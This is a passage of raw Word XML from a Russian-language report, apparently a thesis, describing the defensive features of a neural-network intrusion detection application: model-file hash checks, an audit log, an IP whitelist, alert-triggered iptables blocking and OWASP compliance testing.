    <w:p w14:paraId="39C5EA4C" w14:textId="0519CE25" w:rsidR="00402025" w:rsidRDefault="00EA02A1" w:rsidP="003C0349">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="023B6DE7" wp14:editId="1A6F7240">
            <wp:extent cx="3067050" cy="3351577"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1134996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96509" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3095152" cy="3382286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E502A85" w14:textId="2B0092CD" w:rsidR="00106F01" w:rsidRDefault="002A245A" w:rsidP="00BA257D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изображение интерфейса контроля целостности модели реализованного в приложении</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B57ADAB" w14:textId="77777777" w:rsidR="00BA257D" w:rsidRDefault="00BA257D" w:rsidP="00BA257D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D6899C" w14:textId="508D0A8F" w:rsidR="00106F01" w:rsidRDefault="00106F01" w:rsidP="00106F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При первом запуске системы для каждого файла нейросетевой модели вычисляются эталонные хеш-значения по алгоритму SHA-256. В дальнейшем проверка целостности выполняется автоматически каждые 5 минут</w:t>
      </w:r>
      <w:r w:rsidR="002A245A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">текущие хеш-значения файлов сверяются с эталонными. При обнаружении расхождения </w:t>
      </w:r>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>система формирует предупреждение в интерфейсе и фиксирует событие в журнале аудита. Данный механизм исключает возможность незаметной подмены файлов модели злоумышленником с целью искажения результатов классификации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E87CE5" w14:textId="47B72BA2" w:rsidR="00106F01" w:rsidRDefault="00106F01" w:rsidP="00106F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Все значимые действия пользователей фиксируются в журнале аудита с указанием времени, имени пользователя, типа действия, деталей и IP-адреса источника запроса. Пример журнала представлен на рисунке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3C58A" w14:textId="77777777" w:rsidR="00106F01" w:rsidRDefault="00106F01" w:rsidP="00106F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513E3F2A" w14:textId="7284D906" w:rsidR="00106F01" w:rsidRDefault="00EA02A1" w:rsidP="005D6C1B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1272484F" wp14:editId="2345E1B9">
            <wp:extent cx="5457381" cy="4752975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1951475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5098" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5475670" cy="4768903"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8A71C" w14:textId="6DFF8468" w:rsidR="00106F01" w:rsidRDefault="002A245A" w:rsidP="00BA257D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изображение интерфейса журнала аудита реализованного в приложении</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DF148" w14:textId="77777777" w:rsidR="00BA257D" w:rsidRDefault="00BA257D" w:rsidP="00BA257D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4038FB37" w14:textId="50894567" w:rsidR="00106F01" w:rsidRDefault="00106F01" w:rsidP="00106F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Регистрируются события входа и выхода из системы, успешные и неуспешные попытки аутентификации, запуск и остановка анализа, изменения в списке пользователей, операции с белым списком адресов, блокировка и </w:t>
      </w:r>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>разблокировка IP-адресов, а также нарушения целостности модели. Журнал доступен только администратору и не может быть изменён через интерфейс системы.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F3900" w14:textId="07CE4E6C" w:rsidR="00106F01" w:rsidRDefault="00106F01" w:rsidP="00106F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для снижения уровня ложных срабатываний реализован механизм белого списка</w:t>
      </w:r>
      <w:r w:rsidR="002A245A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> администратор может добавить IP-адреса заведомо легитимных узлов, трафик от которых исключается из анализа.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A245A" w:rsidRPr="002A245A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Интерфейс управления белым списком представлен на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="002A245A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="002A245A" w:rsidRPr="002A245A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EAC61" w14:textId="77777777" w:rsidR="00106F01" w:rsidRDefault="00106F01" w:rsidP="00106F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAECCA8" w14:textId="40F7B83E" w:rsidR="002A245A" w:rsidRDefault="00EA02A1" w:rsidP="005D6C1B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B075FAF" wp14:editId="37D6F7B1">
            <wp:extent cx="3209925" cy="1228724"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1120683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83655" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3209925" cy="1228724"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEAF4B9" w14:textId="61B2050E" w:rsidR="002A245A" w:rsidRDefault="002A245A" w:rsidP="005D6C1B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изображение интерфейса у</w:t>
      </w:r>
      <w:r w:rsidR="00EA02A1" w:rsidRPr="002A245A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>правлени</w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="00EA02A1" w:rsidRPr="002A245A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> белым списком</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A3F8A" w14:textId="77777777" w:rsidR="002A245A" w:rsidRDefault="002A245A" w:rsidP="002A245A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351EDA8D" w14:textId="19FB0CB8" w:rsidR="00106F01" w:rsidRDefault="00106F01" w:rsidP="00EA02A1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">При превышении порогового значения в 10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с одного IP-адреса за 30 секунд система автоматически формирует уведомление в интерфейсе. Администратор может принять решение о блокировке атакующего узла непосредственно из интерфейса — блокировка выполняется через механизм сетевого экрана </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> путём добавления запрещающего правила для входящего трафика. Все операции блокировки и разблокировки фиксируются в журнале аудита.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C0C391" w14:textId="31617737" w:rsidR="00EA02A1" w:rsidRDefault="00EA02A1" w:rsidP="00EA02A1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Совокупность реализованных механизмов обеспечивает соответствие требованиям категории A08 стандарта </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B" w:rsidRPr="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B" w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B" w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B" w:rsidRPr="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> части защиты целостности программных компонентов, а также требованиям A07 в части надёжной аутентификации и управления доступом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622EEAA8" w14:textId="1A9D64F2" w:rsidR="00EA02A1" w:rsidRDefault="004961D0" w:rsidP="004961D0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Все описанные механизмы безопасности были практически проверены в ходе тестирования. Попытки обращения к защищённым конечным точкам без действительного токена возвращали код 401, запросы с токеном недостаточных привилегий — код 403. Нарушение целостности модели было смоделировано </w:t>
      </w:r>
      <w:r w:rsidRPr="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
